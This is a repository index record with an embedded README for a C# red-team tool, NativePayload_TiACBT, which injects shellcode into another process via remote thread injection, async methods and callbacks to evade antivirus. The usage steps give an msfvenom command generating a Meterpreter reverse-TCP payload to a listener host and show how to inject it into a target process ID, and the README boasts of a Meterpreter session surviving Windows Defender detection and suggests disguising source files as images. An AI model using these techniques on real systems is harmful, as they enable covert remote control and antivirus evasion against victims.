{"id":19144498,"url":"https://github.com/damonmohammadbagher/nativepayload_tiacbt","last_synced_at":"2025-05-07T01:11:56.059Z","repository":{"id":111036318,"uuid":"363266543","full_name":"DamonMohammadbagher/NativePayload_TiACBT","owner":"DamonMohammadbagher","description":"NativePayload_TiACBT (Remote Thread Injection + C# Async Method + CallBack Functions Technique)","archived":false,"fork":false,"pushed_at":"2023-06-06T16:39:39.000Z","size":16250,"stargazers_count":14,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-19T17:16:46.491Z","etag":null,"topics":["antivirus-evasion","asynchronous","asyncmethod","bypass-antivirus","callback-functions","callbackfunction","csharp","meterpreter","nativeapi","pentest-tool","pentesting","red-teaming","redteaming","remote-thread-injection"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/DamonMohammadbagher.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2021-04-30T21:48:40.000Z","updated_at":"2025-02-19T10:26:07.000Z","dependencies_parsed_at":"2023-06-25T20:11:45.055Z","dependency_job_id":null,"html_url":"https://github.com/DamonMohammadbagher/NativePayload_TiACBT","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DamonMohammadbagher%2FNativePayload_TiACBT","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DamonMohammadbagher%2FNativePayload_TiACBT/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DamonMohammadbagher%2FNativePayload_TiACBT/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DamonMohammadbagher%2FNativePayload_TiACBT/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/DamonMohammadbagher","download_url":"https://codeload.github.com/DamonMohammadbagher/NativePayload_TiACBT/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252793653,"owners_count":21805058,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus-evasion","asynchronous","asyncmethod","bypass-antivirus","callback-functions","callbackfunction","csharp","meterpreter","nativeapi","pentest-tool","pentesting","red-teaming","redteaming","remote-thread-injection"],"created_at":"2024-11-09T07:35:11.806Z","updated_at":"2025-05-07T01:11:56.049Z","avatar_url":"https://github.com/DamonMohammadbagher.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# NativePayload_TiACBT\nNativePayload_TiACBT  (Remote Thread Injection + C# Async Method + CallBack Functions Technique)\n-------------\nNote: These C# Codes Tested by .Net Framework 3.5 or 4.0 \u0026 4.5 only ;) \u0026 i will Publish Article for these codes soon , in these code we have Remote Thread Injection + Calling Async C# Methods + Callback Functions Technique CBT, in these Codes We have \"CreateRemoteThread or NtCreateThreadEx\" BUT the goal is Changing Code Behavior for Calling API Functions (Remote Thread Injection only), as you can see in these Pictures With API Monitor tool you can see what happened step by step. \n\nas you can see in the Picture3, Code Behavior Detected by Windows Defender(update 2020/12/20) because of Payload for meterpreter BUT i had meterpreter Session  ¯\\_(ツ)_/¯\n\n-------------------------\n\nArticle: Remote Thread Injection + C# Async Method + CallBack Functions Technique (Changing Code Behavior) =\u003e https://damonmohammadbagher.github.io/Posts/05may2021x.html\n\n--------------------------------------------\nC# Codes:  \n```diff\n+    1. NativePayload_TiACBT.cs\n+    2. NativePayload_TiACBT2.cs\n```\nyou can upload your Code like \"image/gif/png/jpeg\" files instead \"text\" file, sometimes this is good idea to avoid using files directly as source code ;D , but still you need to upload source code with zip formats etc (with/without random pwd for each download) ;)\n\n\n     1. NativePayload_TiACBT.png\n     2. NativePayload_TiACBT2.png\n\n--------------------------------------------\n\n1. NativePayload_TiACBT.cs (Remote Thread Injection + Calling Async C# Methods + Callback Functions Technique via EnumUILanguagesA + EnumSystemLocalesA Native APIs)\n\n Note: NativePayload_TiACBT will call APIs: OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread (all methods called via Async C# Method + Callback Functions ...)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_TiACBT.exe [mode 1,2] [TPID] [PAYLOAD]\n    example: NativePayload_TiACBT.exe 1 5930 \"fc,48,00,87,00,....\"\n    example: NativePayload_TiACBT.exe 2 5930 \"fc,48,00,87,00,....\"\n    \n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_TiACBT/blob/main/Pics/NativePayload_TiACBT.png)\n\n -----------------------------------------------------------    \n2. NativePayload_TiACBT2.cs (Remote Thread Injection + Calling Async C# Methods + Callback Functions Technique via EnumUILanguagesA Native API)\n\n Note: NativePayload_TiACBT2 will call APIs: OpenProcess,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx\n \n Note: in this code Method1 (OpenProcess) will call Method2 (VirtualAllocEx) \u0026 Method2 Will Call Method3 (WriteProcessMemory) \u0026 Method3 Will call Method4 (NtCreateThreadEx) and all methods called via Async C# Method + Callback Functions ...\n\n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_TiACBT2.exe   [TPID] [PAYLOAD]\n    example: NativePayload_TiACBT2.exe  4386 \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_TiACBT/blob/main/Pics/NativePayload_TiACBT2.png)\n\n --------------------------------------------    \n Note: as you can see in the Picture, Code Behavior Detected by Windows Defender(update 2020/12/20) because of Payload for meterpreter BUT i had meterpreter Session  ¯\\_(ツ)_/¯\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_TiACBT/blob/main/Pics/AV.png)\n\n --------------------------------------------    \n \u003cp\u003e\u003ca href=\"https://hits.seeyoufarm.com\"\u003e\u003cimg src=\"https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2FDamonMohammadbgher%2FNativePayload_TiACBT\"/\u003e\u003c/a\u003e\u003c/p\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdamonmohammadbagher%2Fnativepayload_tiacbt","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdamonmohammadbagher%2Fnativepayload_tiacbt","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdamonmohammadbagher%2Fnativepayload_tiacbt/lists"}